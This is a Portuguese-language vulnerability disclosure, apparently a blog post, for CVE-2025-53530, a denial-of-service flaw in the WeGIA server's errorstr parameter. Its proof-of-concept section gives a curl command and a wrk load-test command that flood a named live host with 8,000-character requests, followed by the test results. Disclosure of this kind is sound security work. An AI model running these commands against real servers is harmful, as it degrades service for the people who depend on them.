Featured image of post CVE-2025-53530

CVE-2025-53530

Denial of Service (DoS)

CVE-2025-53530: Consumo descontrolado de recursos no parâmetro WeGIA errorstr

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-53530

Resumo

O servidor WeGia possui uma vulnerabilidade que permite solicitações HTTP GET excessivamente longas para uma URL específica. Esse problema surge da falta de validação do comprimento do parâmetro errorstr. Testes confirmaram que o servidor processa URLs de até 8.142 caracteres, resultando em alto consumo de recursos, latência elevada, timeouts e erros de leitura. Isso torna o servidor suscetível a ataques de Negação de Serviço (DoS).

Detalhes

Endpoint vulnerável: GET https://comfirewall.wegia.org:8000/WeGIA?errorstr=AAAA...

  • O parâmetro errorstr na URL permite que invasores adicionem uma quantidade arbitrária de dados de até 8.142 caracteres.
  • Não há validação para o comprimento do parâmetro errorstr processado pelo servidor.
  • Durante os testes, o parâmetro foi estendido com caracteres repetidos (errorstr=), causando exaustão de recursos, timeouts e erros em conexões de soquete.

PoC

Etapas para reproduzir o problema:

  • Execute a seguinte solicitação HTTP GET para reproduzir o problema:

1
  curl "https://comfirewall.wegia.org:8000/WeGIA?errorstr=$(python3 -c 'print("A"*8000)')"

  • Para simular um ataque de alta carga, use a ferramenta wrk:

1
  wrk -t12 -c400 -d60s "https://comfirewall.wegia.org:8000/WeGIA?errorstr=$(python3 -c 'print("A"*8000)')"

Resultados de Testes Atualizados com wrk:

  • 20.180 solicitações foram processadas em 1 minuto.
  • 719 timeouts e 134 erros de leitura ocorreram, indicando que o servidor teve dificuldades para responder à carga.
  • A latência média foi de 249,77 ms, com picos atingindo 2 segundos.
  • O servidor tentou lidar com a carga, mas demonstrou exaustão significativa de recursos, confirmando sua vulnerabilidade a ataques DoS.

Impacto

Esta é uma vulnerabilidade de Negação de Serviço. Qualquer usuário não autenticado com acesso a ferramentas como o OWASP ZAP pode explorar esse problema para deixar o servidor sem resposta. Isso afeta a disponibilidade do aplicativo e pode interromper as operações comerciais. A ausência de limitação de taxa e restrições de rastreamento recursivo aumenta o risco e torna a vulnerabilidade explorável por invasores pouco qualificados.

Referência

https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-562r-xgj9-2r7p

Encontrado por

Rafael Corvino

Colaboradores

Diego Castro

Elisangela Mendonça

Natan Maia Morette

By: CVE-Hunters

Built with Hugo
Theme Stack designed by Jimmy